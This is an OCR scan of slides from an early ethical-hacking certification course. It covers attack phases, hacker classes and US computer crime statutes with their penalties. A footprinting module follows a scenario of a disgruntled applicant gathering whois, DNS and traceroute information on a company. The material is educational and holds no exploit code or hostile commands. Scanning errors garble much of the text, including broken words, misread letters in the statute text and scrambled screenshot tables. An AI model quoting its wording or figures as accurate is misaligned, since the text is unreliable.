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© Nanne 

© Company Affiliation 

© Title/ Function 

©J ob Responsibility 

© Systenn security related experience 

©Expectations 
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Course Materials 




© Identity Card 

© Student Courseware 

© Lab Manual / Workbook 

© Compact Disc 

© Course Evaluation 

© Reference Materials 
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Course Outline 



© Module I : Introduction to Ethical Hacking 
© Modulell: Footprinting 
© Modulelll: Scanning 
© Module IV: Enumeration 
© ModuleV: System Hacking 
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Course OutI i ne (contd..) 



0 Module VI : Trojans and Backdoors 
0 Module VI I: Sniffers 
0 Module VI 1 1 : Denial of Service 
0 Module IX: Social Engineering 
0 ModuleX: Session Hijacking 
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Course OutI i ne (contd..) 



© M odul e X I : H acki ng Web Servers 

0 ModuleXII: Web Application Vulnerabilities 

© Module XI 1 1 : Web Based Password Cracking 
Techniques 

© ModuleXIV: SQL Injection 

© Module XV: Hacking Wireless Networks 



Course OutI i ne (contd..) 



© M odule XVI : Viruses 



0 ModuleXVII: Novell Hacking 
© ModuleXVIII: LinuxHacking 



© Module XIX: Evading I DS, Firewalls and Honey pots 



© Module XX: Buffer Overflows 



© M odule XXI : Cryptography 



K-Gouncil Certified e- business 
Certification Program 



There are five e-Business certification tracl<s 
under BC-Gouncil Accreditation body: 

• 1 Certi f i ed e- B usi ness Associ ate 

• 2. Certified e-Business Professional 

• 3. Certified e-Business Consultant 

• 4. E++ Certified Technical Consultant 

• 5. Certified Ethical Hacker 
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BC-Council Certified Ethical Hacker 



Certified Ethical Hacker Track 



Complete the following steps 



Attend Ethical Hacking Training 



^ ^ START 



Pa^a the foUowtng exams 



EthiciJ Haddng and Countermefisures Exam (312-50) 
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Certified 



™ 



EH 



EtKical Hacker 
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student Facilities 



Class Hours 



Building Hours 




Parking 



Restrooms 



Meals 
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Phones 



M 



Smoking 



Recycling 








© Lab Sessions are designed 
to rei nforce tlie cl assroom 
sessions 

© The sessions are intended 
to give a hands on 
experience only and does 
not guarantee proficiency. 
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Ethical Hacking 



Module I 

I ntroduction to Ethical 
H acki ng 



Module Objective 



© U nderstandi ng the i mportance of security 

© I ntroducing ethical hacl<ing and essential 
termi nol ogy for the modu I e 

© Understanding the different phases involved in 
an exploit by a hacker 

© Overview of attacks and identification of exploit 
categories 

© Comprehending ethical hacking 

© Legal implications of hacking 

© Hacking, law and punishment 
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Problem Definition - Why Security? 



© Evolution of technology focused on ease of use 

© I ncreasi ng complexity of computer 
infrastructure administration and management 

© Decreasi ng ski 1 1 level needed for exploits 

© Direct impact of security breach on corporate 
asset base and goodwi 1 1 

© I ncreased networked environment and network 
based applications 
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Can Hacking Be Ethical? 



0 The noun ' hacker ' refers to a person who enjoys learning 
the detai Is of computer systems and stretch thei r 
capabilities. 

© The verb ' hacking ' descri bes the rapid development of 
new programs or the reverse engi neeri ng of a! ready 
existing software to make the code better, and efficient. 

© The term 'cracker' refers to a person who uses his hacking 
ski lis for offensive purposes. 

© The term ' ethical hacker ' refers to security professionals 
who apply thei r hacki ng ski I Is for defensive purposes. 
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Essential Terminology 



© Threat - An action or event that might prejudice 
security. A threat is a potential violation of security. 

© Vulnerability - Existence of a weakness, design, or 
implementation error that can lead to an unexpected, 
undesirable event compromising the security of the 
system. 

© Target of Evaluation - An IT system, product, or 
component that is identified/ subjected as requiring 
security evaluation. 

© Attack - An assault on system security that derives 
from an i ntel I i gent threat. An attack i s any action that 
violates security. 

© Exploit - A defi ned way to breach the security of an I T 
system through vulnerability. 
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Elements of Security 



© Security i s a state of wel I - bei ng of i nf ormati on and 
i nfrastructures i n which the possi bi I ity of successful yet 
undetected theft, tampering, and disruption of 
infornnation and services is l<ept low or tolerable 

0 Any hacki ng event wi 1 1 affect any one or more of the 
essential security elements. 

0 Security rests on confidentiality, authenticity, integrity, 
and availability 

• Confidentiality is the concealment of information or resources. 

• Authentidty is the identification and assurance of the origin of 
information. 

• I ntegrity refers to the trustworthi ness of data or resources i n 
termsof preventing improper and unauthorized changes. 

• Availability refers to the ability to use the information or 
resource desired 
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What Does a M al i ci ous H acker Do? 



©Reconnaissance 

• Active/ passive 

©Scanning 
©Gaining access 

• Operati ng system level / 
application level 

• Network level 

• Denial of service 

© |V| ai ntai ni ng access 

• Uploading/ altering/ 
downloadi ng programs or 
data 

©Covering tracl<s 
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Reconnaissance 
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Scanning 



Clearing 
Tracks 
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Maintaining 
Access 
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0 Reconnai ssance refers to the preparatory phase where 
an attacker seeks to gather as much information as 
possibleabout a target of evaluation prior to launching 
an attack. 1 1 involves network scanning either external 
or internal without authorization 

0 Business Risk- 'Notable' - Generally noted as a 
"ratti i ng the door knobs" to see if someone i s watch i ng 
and responding. Could be future point of return when 
noted for ease of entry for an attack when more is 
known on a broad scale about the target. 



Phase 1- Reconnaissance (contd.) 



© Passive reconnaissance involves monitoring 
network data for patterns and clues. 

• Examples include sniffing, information gathering 
etc. 

© Active reconnaissance involves probing the 
network to detect 

• accessible hosts 

• open ports 

• location of routers 

• detai I s of operati ng systems and servi ces 
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Phase 2 - Scanning 



© Scanni ng refers to pre- attack phase when the hacker 
scans the network with specific i nformation gathered 
during reconnaissance. 

© Business Risk- 'High' - Hackers haveto get a single 
point of entry to launch an attack and could be point of 
exploit when vulnerability of the system is detected. 

© Scanning can include use of dialers, port scanners, 
network nriappi ng, sweepi ng, vul nerabi I ity scanners etc. 
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Phase 3 - Gai ni ng Access 



0 Gai ni ng Access refers to the true attack phase. The 
hacker exploits the system. 

© The exploit can occur over a LAN, locally, I nternet, 
offline, as a deception or theft. Examples include stack- 
based buffer overflows, denial of service, session 
hijacking, password filtering etc. 

© I nfluencing factors include architecture and 
configuration of target system, skill level of the 
perpetrator and initial level of access obtained. 

© Busi ness Risk - 'H ighest' - The hacker can gai n access 
at operating system level, application level or network 
level. 
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Phase 4 - M ai ntai ni ng Access 



0 M ai ntai ni ng Access refers to the phase when the hacker 
tries to retai n his 'ownershi p' of the system. 

0 The hacker has exploited a vul nerabi I ity and can tamper 
and compromi se the system. 

0 Someti mes, hackers harden the system from other 
hackers as wel I (to own the system) by securi ng thei r 
exclusive access with Backdoors, RootKits, Trojans and 
Trojan horse Backdoors. 

0 H ackers can upload, download or mani pulate data / 
applications/ configurations on the 'owned' system. 



Bl-Council 



Phase 5 - Coveri ng Tracks 



L 



© Coveri ng Tracks refers to the acti viti es undertaken by 
the hacker to extend his misuse of the system without 
being detected. 

0 Reasons include need for prolonged stay, continued use 
of resources, removing evidence of hacking, avoiding 
legal action etc. 

© Examples includeSteganography, tunneling, altering 
log files etc. 

© H ackers can remain undetected for long periods or use 
this phase to start a fresh reconnaissance to a related 
target system. 



Hacker Classes 



0 Black hats 

• Individuals with 
extraordi nary computi ng 
ski 1 1 s, resorti ng to mal i ci ous 
or destructive activities. 
Also known as 'Crackers/ 

oWhiteHats 

• Individuals professing 
hacker skills and using 
them for defensive 
purposes. Also known as 
'Security Analysts'. 

0G ray Hats 

• I ndividuals who work both 
offensively and defensively 

at various times. 
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0 Ethical Hacker Classes 

• Former Black Hats 

- Reformed crackers 

- First-hand experience 

- Lesser credibility perceived 

• White Hats 

- Independent security 
consultants (maybe groups 
as well) 

- CI ai ms to be knowl edgeabi e 
about black hat activities 

• Consulting Firms 

- Partof I CT firms 

- Good credentials 



H ackti vi sm 



0 Refers to 'hacki ng with / for a cause'. 

© Comprises of hacl<ers with a social or political agenda 

© Ai ms at sendi ng across a message through thei r hacki ng 
activity and gai ni ng visi bi I ity for thei r cause and 
themselves. 

© Common targets include government agencies, M NCs, 
or any other entity perceived as 'bad' or 'wrong' by these 
groups/ individuals. 

© 1 1 remai ns a fact however, that gai ni ng unauthorized 
access i s a cri me, no matter what the i ntent. 
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What do Ethical H ackers do? 



© "If you know the enemy and know yourself, you need 
not fear the result of a hundred battles." 

- - SunTzu, Artof War 

© Ethical hackers tries to answer: 

• What can the i ntruder see on the target system? 
(Reconnaissance and Scanning phase of hacl<ing) 

• What can an intruder do with that information? (Gaining 
Access and M ai ntai ni ng Access phases) 

• Does anyone at the target noti ce the i ntruders attempts or 
success? (Reconnaissance and Covering Tracks phases) 

© I f hired by any organization, an ethical hacker asks the 
organization what it is trying to protect, against whom 
and what resources it is wi 1 1 i ng to expend i n order to 
gain protection. 
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Skill Profile of an Ethical Hacker 




© Computer expert adept at 
technical domains. 

© In-depth knowledge about 
target platforms (such as 
windows, Unix, Linux). 

© Exemplary knowledge in 
networking and related 
hardware/ software. 

© Knowledgeable about 
security areas and related 
issues - though not 
necessari ly a security 
professional. 
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H ow do they go about it? 



© Any security evaluation involves tlireeconnponents: 

© Preparation - I n this phase, a fornnal contract is signed 
that contains a non-disclosure clause as well as a legal 
clause to protect the ethical hacker against any 
prosecution that he may attract during the conduct 
phase. The contract also outi i nes i nfrastructure 
perimeter, evaluation activities, time schedules and 
resources aval I able to him. 

© Conduct - I nth is phase, the evaluation technical report 
is prepared based on testing potential vulnerabilities. 

© Conclusion - I n this phase, the results of the evaluation 
is communicated to the organization / sponsors and 
corrective advise/ action is taken if needed. 
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Modes of Ethical Hacking 



© Remote network -This mode attempts to si mul ate an 
intruder launch an attack over the I nternet. 

© Remote dial-up network - This mode attempts to 
SI mul ate an intruder launchi ng an attack agai nst the 
cl i ent's modem pool s. 

© Local network - This mode simulates an employee wi 
lal access gaining unauthorized access over the loca 



network. 



th 



© Stolen equipment - This mode simulates theft of a 
critical intormation resource such as a laptop owned by 
a strategist, (taken by the client unaware of its owner 
and given to the ethical hacker). 

© Social engineering - This aspect attempts to check the 
integrity 6t the organization s employees. 

© Physical entry - This mode attempts to physical I y 
compromi se the organ i zati on 's I CT infrastructure. 

Bl-Council 



Security Testing 



© There are many different forms of security testi ng. 
Examples 1 ncl ude vul nerabi I ity scanni ng, ethi cal 
hacking and penetration testing. Security testing can be 
conducted usi ng one of two approaches: 

© Blacl<-box (with no prior l<nowledgeof the 
infrastructure to be tested) 

© White- box (with a complete knowledge of the network 
infrastructure). 

© I nternal Testing is also known as Gray- box testing and 
this exami nes the extent of access by i nsiders withi n the 
network. 
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Deliverables 



0 Ethical Hacking Report 

© Details the results of the hacking activity, matching it 
agai nst the work schedul e deci ded pri or to the conduct 
phase. 

0 Vulnerabilities are detailed and avoidance measures 
suggested. Usually delivered in hard copy format for 
security reasons. 

0 Issues to consider - Nondisclosureclause in the legal 
contract - aval I i ng the ri ght i nformati on to the ri ght 
person), integrity of the evaluation team, sensitivity of 
information. 
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Computer Crimes and I mpli cations 



© Cyber Security Enhancement Act 2002- innplicateslife 
sentences for hackers who 'recklessly' endanger the 
lives of others. 

© TheCSI/FBI 2002 Computer Crime and Security 
Survey noted that 90% of the respondents 
acknowledged security breaches, but only 34% reported 
the cr i me to I aw enforcement agenci es. 

© The FBI computer cri mes squad esti mates that between 
85 to 97 percent of computer i ntrusions are not even 
detected. 

© Stigma associated with reporting security lapses 
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Legal Perspective (US Federal Law) 



Federal Criminal Code Related to Computer Crime: 

0 18 U.S.C. § 1029. Fraud and Related Activity in Connection 
with Access Devices 

0 18 U.S.C. § 1030. Fraud and Related Activity in Connection 
with Computers 

0 18 U.S.C. § B62. Communication Lines, Stations, or 
Systems 

0 18U.S.C. §2510etseq. Wireand Electronic 

Communications Interception and Interception of Oral 
Com muni ca ti ons 

0 18U.S.C. §2701etseq. Stored Wireand Electronic 
Communications and Transactional Records Access 
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Section 1029 



Subsection (a) Whoever - 

(1) knowingly and with intent to defraud produces, uses, 
or traffics i n one or more counterfeit access devices; 

(2) l<nowingly and with intent to defraud traffics in or uses 
one or more unauthorized access devices during any 
one-year period, and by such conduct obtains anything 
of value aggregating $1000 or more during that period; 

(3) l<nowinglyand with intent to defraud possesses fifteen 
or more devices which are counterfeit or unauthorized 
access devices; 

(4) l<nowingly, and with intent to defraud, produces, 
traffics in, has control or custody of, or possesses 
devi ce- maki ng equi pment; 
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Section 1029 (contd.) 



(5) knowingly and with intent to defraud effects 
transactions, with lor more access devices issued to 
another person or persons, to receive payment or any 
other thi ng of val ue duri ng any 1-year peri od the 
a^e^ate val ue of whi ch i s equal f o or greater than 

(6) without the authorization of the issuer of the access 



device, 
person 



<nowinglyand with intent to defraud solicits a 
or the purpose of— 



(A) offering an access device; or 

(B) selling information regarding or an application to obtain an 
access aevice; 

(7) knowingly and with intent to defraud uses, produces, 
traffics in, has control or custody of, or possesses a 
telecommunications instrument that has been modified 
or altered to obtain unauthorized use of 
tel ecommu n i cati ons servi ces; 
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Section 1D29 (contd.) 



(8) knowingly and with intent to defraud uses, produces, traffics in, 
has control or custody of, or possesses a scanning receiver; 

(9) knowingly uses, produces, traffics in, has control or custody of, or 
possesses hardware or software, knowing it has been configured to 
insert or modify telecommunication identifying information 
associated with or contained in a telecommunications instrument 
so that such instrument may be used to obtain telecommunications 
service without authorization; or 

(10) without the authorization of the credit card system member or its 
agent, knowi ngly and with i ntent to defraud causes or arranges for 
another person to present to the member or its agent, for payment, 
1 or more evi dences or records of transacti ons made by an access 
device. 
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(A) i n the case of an offense that does not occur after a 
conviction for another offense under this section-- 

• (i) if the offense is under paragraph (1), (2), (3), (6), (7), or (10) of 
subsection (a), a fine under this title or imprisonment for not 
more than 10 years, or both; and 

• (ii) if the offense is under paragraph (4), (5), (8), or (9) of 
subsection (a), a fine under this title or imprisonment for not 
more than 15 years, or both; 

( B) 1 n the case of an offense that occurs after a convi cti on 
for another offense under this section, a fine under this 
titleor imprisonment for not more than 20 years, or 
both; and 

(C) in either case, forfeiture to the United States of any 
personal property used or intended to be used to commit 
the offense. 
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Section 1030- (a)(1) 



Subsection (a) Whoever-- 

(1) having knowingly accessed a connputer without authorization or 
exceeding authorized access, and by nneans of such conduct having 
obtained infornnation that has been deternnined by the United States 
Governnnent pursuant to an Executive order or statute to require 
protection against unauthorized disclosure for reasons of national 
defense or foreign relations, or any restricted data, as defined in 
paragraph y of section llof theAtonnic Energy Act of 1954, with 
reason to believe that such infornnation so obtained could be used to 
the injury of the United States, or to the advantage of any foreign 
nation willfully connnnunicates, delivers, transnnits, or causes to be 
connnnunicated, delivered, or transnnitted, or attennpts to 
connnnunicate, deliver, transnnit or cause to be connnnunicated, 
delivered, or transnnitted thesanneto any person not entitled to 
receive it, or wi I Iful ly retai ns the sanne and fai Is to del i ver it to the 
officer or ennployee of the U nited States entitled to receive it; 
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Section 1D30 (2) (A) (B) (C) 



(2) intentionally accesses a connputer without 
authorization or exceeds authorized access, and thereby 
obtainS" 

(A) information contained in a financial record of a financial 
institution, or of a card issuer as defined in section 1602(n) of 
title 15, or contai ned i n a f i le of a consumer reporti ng agency on 
a consumer, as such terms are defined in the Fair Credit 
Reporti ng Act (15 U.S.C. 1681etseq.); 

(B) information from any department or agency of the United 
States; or 

(C) information from any protected computer if the conduct 
involved an interstate or foreign communication; 
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Section 1030 (3) (4) 



(3) intentionally, without authorization to access any 
nonpubl ic computer of a department or agency of the 
U nited States, accesses such a computer of that 
department or agency that is excl usi vely for the use of 
the Government of the U nited States or, i n the case of a 
computer not exclusively for such use, is used by or for 
the Government of the U nited States and such conduct 
affects that use by or for the Government of the U nited 
States; 

(4) knowi nqly and with i ntent to defraud, accesses a 
protected computer without authorization, or exceeds 
authorized access, and by means of such conduct 
furthers the i ntended fraud and obtai ns anythi ng of 
value, unlesstheobject of the fraud and the thing 
obtai ned consists only of the use of the computer and 
the val ue of such use is not more than $5,000 in any 1- 
year period; 



Section 1030 (5) (A) (B) 



(5)(A)(i) knowingly causes the transmission of a 
program, information, code, or command, and 
as a result of such conduct, i ntentional ly causes 
damage without authorization, to a protected 
computer; 

( i i ) i ntenti onal ly accesses a protected computer 
without authorization, and as a result of such 
conduct, recklessly causes damage; or 

(111)1 ntenti onal I y accesses a protected computer 
without authorization, and as a result of such 
conduct, causes damage; and 

(5)(B) by conduct described in clause(i), (i ), or 
(lii) of subparagraph (A), caused (or, in the case 
of an attempted offense, would, if completed, 
havecaused)-- 
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Section 1D30 (5) (B) (contd.) 



(i) loss to lor more persons during any 1- year period (and, 
for purposes of an investigation, prosecution, or other 
proceeding brought by the United States only, loss 
resuiti ng ff^om a related course of conduct affecti ng lor 
more other protected computers) aggregating at least 
$5,000 in value; 

(ii) the modification or impairment, or potential 
modification or impairment, of the medical 
examination, diagnosis, treatment, or care of lor more 
individuals; 

( i i i ) physi cal i nj ury to any person; 

(iv) a threat to public health or safety; or 

( v) damage affecti ng a computer system used by or for a 
government entity i n furtherance of the ad mi ni strati on 
of justice, national defense, or national security; 



Bl-Council 



Section 1030 (6) (7) 



(6) knowingly and with intent to defraud traffics 
(as definea in section 1029) in any password or 
similar information through which a computer 
may be accessed without authorization, if-- 

(A) such trafficki ng affects 1 nterstate or foreign 
commerce; or 

(B) such computer is used by or for the Government of 
the United States; 

(7) with i ntent to extort from any person any 
money or other thi ng of val ue, transmits i n 
i nterstate or f orei gn commerce any 
communication containing any threat to cause 
damage to a protected computer; 
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(1) (A) a fine under this title or imprisonment for not more 
than ten years, or both, i n the case of an offense under 
subsection (a)(1) of this section which does not occur 
after a conviction for another offense under this section, 
or an attempt to commit an offense punishable under 
this subparagraph; and 

(B) afineunder thistitleor imprisonment for not more than 
twenty years, or both, i n the case of an offense under 
subsection (a)(1) of this section which occurs after a conviction 
for another offense under this section, or an attempt to commit 
an offense punishable under this subparagraph; 

(2) (A) except as provided in subparagraph (B), a fine 
under thistitleor imprisonment for not more than one 
year, or both, i n the case of an offense under subsection 
{a)(^), (a)(3), (a)(5)(A)(iii), or (a)(6) of thissection 
which does not occur after a conviction for another 
offense under this section, or an attempt to commit an 
offense punishable under this subparagraph; 



Penalties (contd.) 



© (B) a fine under this title or innprisonmentfor not nnore 
than 5 years, or both, i n the case of an offense under 
subsection (a)(2), or an attempt to connnnit an offense 
punishable under this subparagraph, if-- 

• ( i ) the offense was connnni tted for purposes of connnnerci a! 
advantage or privatefinandal gain; 

• (ii) the offense was comnni tted in furtheranceof any criminal or 
tortuous act in violation of the Constitution or laws of the 

U nited States or of any State; or 

• (iii) thevalueof theinfornnation obtained exceeds $5,000; 

0 (C) a fine under this title or imprisonnnentfor not more 
than ten years, or both, i n the case of an offense under 
subsection (a)(2), (a)(3) or (a)(6) of this section which 
occurs after a conviction for another offense under this 
section, or an attempt to commit an offense punishable 
under this subparagraph; 
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Penalties (contd.) 



(3)(A) a fine under this title or imprisonment for not more 
than five years, or both, i n the case of an offense under 
subsection (a)(4) or (a)(7) of this section which does not 
occur after a conviction for another offense under this 
section, or an attempt to commit an offense punishable 
under this subparagraph; and 

(3)(B) a fine under this title or imprisonment for not more 
than ten years, or both, i n the case of an offense under 
subsection (a)(4), (a)(5)(A)(iii), or (a)(7) of this section 
which occurs after a conviction for another offense 
under this section, or an attempt to commit an offense 
punishable under this subparagraph; and 
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Penalties (contd.) 



(4)(A) a fine under this title, imprisonment for not more 
than 10 years, or both, i n the case of an offense under 
subsection (a)(5)(A)(i), or an attempt to commit an 
offense punishable under that subsection; 

(4)(B) a fine under this title, imprisonment for not more 
than 5 years, or both, i n the case of an offense under 
subsection (a)(5)(A)(ii), or an attempt to commit an 
offense punishable under that subsection; 

(4)(C) a fine under this title, imprisonment for not more 
than 20 years, or both, in the case of an offense under 
subsection (a)(5)(A)(i) or (a)(5)(A)(ii), or an attempt to 
commit an offense punishable under either subsection, 
that occurs after a conviction for another offense under 
this section. 
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Summary 



0 Security is critical across sectors and industries. 

© Ethical Hacking is a methodology to simulate a 
malicious attack without causing damage. 

0 Hacking involves five distinct phases. 

0 Security evaluation includes preparation, conduct and 
evaluation phases. 

0 Cyber cri me can be differenti ated i nto two categori es. 

0 U.S. Statutes^ 1029 and 1030 primarily address cyber 
cri me. 
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Ethical Hacking 



Module 1 1 
Footprinting 



Scenario 



Adam is furious. He had applied for the network 




engineer job at targetconnpany.com He believes 
that he was rejected unfairly. He has a good track 
record, but the economic slowdown has seen many 
layoffs including his. H e is frustrated - heneedsa 
job and feels he has been wronged. Late i n the 
evening he decides that hewill prove his mettle. 



© What do you think Adam would do? 

© Where would he start and how would he go about it? 

© Are there any tools that can help him in his effort? 

©Can he cause harm to targetcompany.com? 

© As a security professional, where can you lay checkpoints and how 
can you deploy counter measures? 
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Module Objectives 



© Overview of the Reconnaissance Phase 

© IntroducingFootprinting 

© Understanding the information gathering 
methodology of hacl<ers 

© Comprehending the Implications 

© Learn i ng some of the tools used for 
reconnaissance phase 

© Deploying countermeasures 
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Revisiting Reconnaissance 



1 

Reconnaissance 





Scanning 



5 



Clearing 
Tracl<s 





iviaintaining 
Access 




© Reconnaissance refers to 
the preparatory phase 
where an attacker seeks 
to gather as much 
information as possible 
about a target of 
evaluation prior to 
launching an attack. 

© It involves network 
scanning either external 
or internal without 
authorization. 
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Defi ni ng Footpri nti ng 



© Footpri nti ng isthe blueprinting of the security 
profile of an organization, undertaken in a 
methodological manner. 

© Footpri nting isoneof thethreepre-attack 
phases. The others are scanni ng and 
enumeration. 

© Footpri nting results in a unique organization 
profi le with respect to networks (I nternet / 
Intranet/ Extranet/ Wireless) and systems 
involved. 
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I nformation Gathering Methodology 



© Unearth initial information 

© Locatethenetworl< range 

© Ascertai n acti ve mach i nes 

© Di scover open ports / access poi nts 

© Detect operati ng systems 

© U ncover servi ces on ports 

© |VlaptheNetworl< 



Footpnntmg 
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Unearthing Initial 



o CoiTiiTionly includes : 
©Domain nannelool<up 
©Locations 

©Contacts (Telephone/ 
mail) 

© I nformation Sources : 
©Open source 
©Whois 
©Nslookup 
© Hacking Tool : 
©Sam Spade 
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nformation 



iJC Spade - Script Conso 



File Edit View Window 



www.tar 




ools 



Zone TransPer... 
5MTP Relay check. . . 
Scan Addresses... 
Crawl website... 
Browse web... 
Check cancels... 
Fast traceroute 
Slow traceroute 
S-lang command... 
Decode URL... 
Parse email headers, 



nslookup 
Whois 
IP Block 
Dig 

Traceroute 
Finger 
SMTP Verify 
Time 
Blacklist 
Abuse Lookup 



Whois 




Registrant : 

target company ( tar get company- D OH) 
XXX Everest Blk A. Enclave 
Aiiieerpet 
Hyde rati ad 

Andraprade3h,500038 



Domain Name: targetcomiianyjj 



tive Contact : 
R****, J*** [RJXX2-0RG) targetcon^anyOHDl.VSH] 

tar get company 
XXX, Everest Block, A. Enclave, 
Ameerpet 

Hyderabad, Andrapradesh 500038 

IN 91 40 XXXX 3 2 9X Fax- 91 40 XXXX 3 2 9X 

Technical Contact: 

S*****, V**** (VSXX) t e Che ontacteWEB IHBIA.COM 

XXX3 Inc 

Hoffman Estates^ IL 60194 

US. 408/ XXX- XXXX 408/XXX-XXXX 

Record expires on 14-Oct-200X. 
Record created on 13-Oct-1997 .| 

Database ^a<=it ?jr.>^^^^^ ^ n-7-4q-n4 EST. 




Registrant: 

targetcompany (targetcompany-DOM ) 
# Street Address 
City, Province 
State, Pin, Country 

Domain Name: targetcompany.COi^l 



Administrative Contact: 

Surname, Name (SNI DNo-ORG) targetcompany@domain.com 

targetcompany (targetcompany- DOM ) # Street Address 
City, Province, State, Pin, Country 
Telephone: XXXXX Fax XXXXX 
Technical Contact: 

Surname, Name (SNI DNo-ORG) targetcompany(a>domain.com 
targetcompany (targetcompany- DOM ) # Street Address 
City, Province, State, Pin, Country 
Telephone: XXXXX Fax XXXXX 



Domain servers in listed order : 



NSl .WEBH0ST.COM 
NS2 . WEBHOST . COM 



XXX . XXX . XXX . XXX 
XXX . XXX . XXX . XXX 
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Nslookup 



© Nslookup is a program to query I nternet 
domai n name servers. Di spl ays i nformati on 
that can be used to diagnose Domain Name 
System (DNS) infrastructure. 

© Helps find additional I P addresses if 
authoritative DNS is known from whois. 

©MX record reveals the I P of the mai I server. 

© Both Unix and Windows come with a Nslookup 
client. 

© Third party clients are also aval I able- E.g. Sam 
Spade 
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Scenario (contd.) 




Adam knows that tar getcompany is based at NJ . 
However, he decides to check it up. He runs a 
whoisfronnan onlinewhois client and notes the 
donnain information. Hetakes down the email ids 
and phone numbers. He also discerns the domain 
server IPs and does an interactive Nslookup. 



0 I deal I y. what extent of information should be revealed to Adam 
during this quest? 

© Are there any other means of gaining information? Can he use the 
information at hand in order to obtain critical information? 

©What are the impli cations for the target company? Can because 
harm to targetcompany at this stage? 
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0 Commonly includes: 

©Finding the range of I P 
addresses 

©Discerning the subnet masl< 

© I nformation Sources: 

©ARIN (American Registry of 
Internet Numbers) 

©Traceroute 

© Hacking Tool : 

©NeoTrace 
©Visual Route 

BI-Gouncil 



k Range 




so-2-0-0.pr1.lga4.us. 
Response Time: 338 ms 



g3-9.core01.jfk02.atlas.cogentco.com 
Response Time: 425 ms 



p15-0.core01.^01 
Resj3-f)nse T 




atias.cogentco.com 
me: 421 ms 



64.1 24.51.186.cogentco.com 
Response Time: 421 ms 



p4-0.core02.dca01 .atias.cogentco.tjom 
Response Time: 400 ms 



g8.ba21 .b002281-1 .oraOl . atlas. cogentco.c. 
Response Time: 462 ms 



pi 5-0.core01 .mciOl .atias.cogentco.com 
Response Time: 421 ms 



pi 4-0.core01 .diWOI .atlas.cogentco.com 
Response Time: 426 ms 




TEHRAN 



CAIRO 



MEXICC 



r^B\J Dl 



IP Address 




so-5-2-0,crl,lgal,us,nifnx,net 
so-0-0-0,crl,lga2,us,mfnx,net 
so-2-0-0,prl,lga4,us,mfnx,net 
64, 124,51, 186, cogentco.corn 
g3-9,core01,jfkJ02,atlas,cogentco,corn 
p4-0 , core02 , dcaOl , atlas ,cogentco , corn 
pl5-0,core01 ,dca01 , atlas, cogentco, corn 
pl4-0,core01 ,dyi ,atlas,cogentco,com 
pl5-0,core02,dfw01,atlas,cogentco,com 
pl5-0,core01 ,nici01 ,atlas,cogentco,com 
p5-0 , core02 , ordOl , atlas , cogentco , corn 
g8,ba21 ,b002281-l .ordOl ,adas,cogentco,ci 



I RT (rns) | Network 

■JIJ nU'^/VLIlLI u 

339 ABOVENET 



I Graph 



319 
338 
421 
425 
400 
421 
426 
441 
421 
467 
462 



ABOVENET-6 

ABOVENET 

ABOVENET 

COGENT-NB-0000 

COGENT-NB-0000 

COGENT-NB-0000 

COGENT-NB-0000 

COGENT-NB-0000 

COGENT-NB-0000 

COGENT-NB-0000 

COGENT-NB-0000 



ARIN 



© ARI N allows search on 
the who! s database to 
locate information on 
networks autonomous 
system numbers (ASNs), 
network- related handles 
and other related point 
of contact (POC). 

© ARIN whois allows 
queryi ng the I P address 
to hel p f i nd i nf ormati on 
on the strategy used for 
subnet addressing. 
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"Applying the principles of stewardship, ARIN, a nonprofit corporation, allocates 
Internet Protocol resources; develops consensus-based policies; and facilitates the 
advancement of the Internet through information and educational outreach" 



Database 8t Template Conversion 
Information Center 



Registration 

How to get IPv4 and IPv6 addresses, 
AS Numbers, and Transfer, Help Desk 
and Reassignment information 

Meetings 

Upcoming ARIN meetings and 
sponsorship information. Minutes 
from previous AC, BOT, PPM and 
Member's meetings 

Library 



Policy 

How ARIN Policy is made. Current 
Policy Discussions and policy proposal 
archive, 

Members flip 

Information about member benefits, 
how to join as a non-subscriber, and 
a list of ARIN members. 



Internet Info 



|- Tn1-prnpf 



Tupusdi lur 
ansfer of 6bone 

Address 
Management 
sponsibilitiesto 
RIRs 
more... 
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Screenshot: ARI N Whois Output 



Output from ARIN Whois 



ARIN Home Page ARIN Site Map ARIN Whois Help HEW! Database 5. Template Conversion Information Center 



Search for : 



Submit Query 



Search results for: 207.46.230.218 



Microsoft ( NETELK-HICROSOFT-GLOEAL-NET ) 
One Redmond Way 
Redmond, WA 9S052 
US , 



Netname : HICROSOFT-GLOBAL-NET 
Netblock: 207. 46.0.0 - 2 07.46.255.255 



Coordinator : 

Microsoft ( ZH39-ARIN ) nocGniicrosof t . com 
425-936-4200 



IP Address block allocated to the 
domain mlcrosoft.com 



Domain System inverse mapping provided by: 

207.46. 138.20 



DNS1.CP.HSFT.NET 
DNS2 .CP.HSFT.NET 
DNS1.TK.HSFT.NET 



207.46. 138.21 
207.46.232 .37 
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Traceroute 



© Traceroute works by expl oi ti ng a feature of the I nternet 
Protocol called TTL, or Time To Live. 

© Traceroute reveals the path IP packets travel between 
two systems by sending out consecutive U DP packets 
with ever-increasingTTLs . 

© As each router processes a I P packet, it decrements the 
TTL. When theTTL reaches zero, it sends back a "TTL 
exceeded" message (usi ng I CM P ) to the originator. 

© Routers with DNS entries reveal the name of routers, 
network affiliation and geographic location. 
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Tool : N eoTrace ( N ow M cAfee Vi sual Trace) 



File Edit View Help 



I Target p 



■'I ^Go I g Map View • 0 Info Pane 



ySave ftCopy ftp-: 



@ Ping '^Options ® Online Help 



-7 



^NeoTrace 

Professional 



213.42.12.11 
Response Time: 21 6 ms 



194.1 70.2.117 
Response Time: 1 54 ms 



2i6.23c.43.i9; 
Response T 



N eoTrace shows the 
traceroute output 
visually- map view, 
node view and I P view 




pos5-1 .:r02.ash01 .pccwbtn.net 
Response Time: 71 3 ms 



bhr1-pos-1 0-0.sterling1 dc2.cw.net 
Response Time: 446 ms 




pos5-3.cr02.ash01 .pccwbtn.net 
Response Time: 5S5 ms 



www.google.com 
Response Time: 533 ms 











Toronto* . 


















□ 






orl< 






asab 




































* MEXICO ClUDAD DE 




















1 *1 V SANTA FF 






U 




# 


IP Address 


Name 


RT (ms) 


Ave (ms) , 


Min(ms) 1 Max(ms) | #5,,, 


1 #D,,, 


, % Loss 


Network 


1 


217,165,236,73 


5AM 


0 


0 


0 


0 1 


0 


0% 




2 


213,42,12,11 




216 


216 


216 


216 1 


0 


0% 


AE-EMIRNET-990929 


3 


213,42,12,130 




135 


135 


135 


135 1 


0 


0% 


AE-EMIRNET-990929 


4 


194,170,2,117 




154 


154 


154 


154 1 


0 


0% 


EMIRNET-EMIRNET 


5 


195,229,31,66 


dxb-emix-rb , ge 1 30 , emix , ae 


159 


159 


159 


159 1 


0 


0% 


AE-EMIRNET-971125 


6 


195,229,0,234 


